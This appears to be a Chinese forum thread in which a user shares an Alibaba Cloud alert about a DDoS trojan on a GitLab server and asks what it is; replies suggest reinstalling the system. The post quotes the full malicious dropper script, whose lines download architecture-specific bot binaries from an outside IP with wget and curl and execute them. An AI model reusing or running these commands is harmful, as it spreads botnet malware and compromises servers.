收到了 阿里云安全事件告警 帮忙看看这是啥

榆榆不可及

话说 这个ip怎么这么快啊

告警描述：检测模型发现您的服务器上运行了DDoS木马，DDoS木马是用于从被攻陷主机上接受指令，对黑客指定目标发起DDoS攻击的恶意程序。

异常事件详情
文件路径：/var/opt/gitlab/gitlab-workhorse/kk6 (deleted)

异常的脚本内容：

1. #!/bin/bash
   
2. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86;cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 >3AvA;chmod +x *;./3AvA x86
   
3. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips;cat gang123isgodloluaintgettingthesebinslikedammwtf.mips >3AvA;chmod +x *;./3AvA mips
   
4. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl;cat gang123isgodloluaintgettingthesebinslikedammwtf.mpsl >3AvA;chmod +x *;./3AvA mpsl
   
5. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm4 >3AvA;chmod +x *;./3AvA arm4
   
6. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm5 >3AvA;chmod +x *;./3AvA arm5
   
7. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm6 >3AvA;chmod +x *;./3AvA arm6
   
8. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm7 >3AvA;chmod +x *;./3AvA arm7
   
9. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc;cat gang123isgodloluaintgettingthesebinslikedammwtf.ppc >3AvA;chmod +x *;./3AvA ppc
   
10. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k;cat gang123isgodloluaintgettingthesebinslikedammwtf.m68k >3AvA;chmod +x *;./3AvA m68k
    
11. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4;cat gang123isgodloluaintgettingthesebinslikedammwtf.sh4 >3AvA;chmod +x *;./3AvA sh4
    

复制代码

菜单

重做系统就是了